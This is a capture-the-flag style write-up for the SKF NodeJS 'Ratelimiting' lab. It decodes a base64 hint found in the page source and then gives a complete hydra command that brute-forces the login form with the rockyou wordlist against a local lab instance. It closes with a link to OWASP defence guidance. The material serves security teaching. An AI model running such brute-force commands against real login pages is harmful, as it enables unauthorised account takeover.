SKF write-ups
Search…
NodeJS - Ratelimiting

Running the app nodeJs

First make sure nodejs and npm are installed on your host machine. After installation, we go to the folder of the lab we want to practice. "i.e /skf-labs/XSS, /skf-labs/RFI/" and run the following commands:
1
$ npm install
Copied!
1
$ npm start
Copied!
Now that the app is running let's go hacking!

Reconnaissance

The application shows a admin login form, but we don't have the credentials, we'll have to somehow login inorder to solve the challenge, the name of the challenge is 'Ratelimiting', from that we know that we need to bruteforce login, but what would be the username?
Let's do more investigation, upon viewing the source code, there is a base64 message commented out there.
We are going to decrypt the base64 encoded string using terminal as shown in the below image.
1
$ echo 'RGV2ZWxvcGVyIHVzZXJuYW1lOiBkZXZ0ZWFtCkNsaWVudDogUm9ja3lvdQ==' | base64 --decode
2
$ Developer username: devteam
3
$ Client: Rockyou
Copied!

Exploitation

From this, it seems that the developer has an account with username devteam, so we probably need to bruteforce into that =) Client, rockyou? Are we referring to the rockyou wordlist?
Rockyou Wordlist - [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-40.txt)
So we'll have to bruteforce the login form which is post based using some tool, I prefer hydra & burp suite's intruder to do this, in this writeup, i'll demonstrate this using hydra.
Bruteforcing using Hydra
1
hydra -l devteam -P ./rockyou-40.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"
2
3
let's make this clear since it might be confusing for newbies or those who have never used hydra before.
4
5
-l denotes username here.
6
-P denotes the location of the wordlist with the passwords
7
0.0.0.0 is the host address
8
-s denotes the target port.
9
http-post-form is used to specify that this is a http-post-form.
10
"/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
11
F=Invalid <-- This parameter is used to filter out invalid logins.
Copied!
After you launch a bruteforce attack against the login function, after several minutes, you'll get the password like the below screenshot.

Additional sources

Please refer to the OWASP's guide for protecting against such type of bruteforce attacks which happens because ratelimiting is not set.
Brute Force Attack Software Attack | OWASP Foundation
Export as PDF
Copy link
Edit on GitHub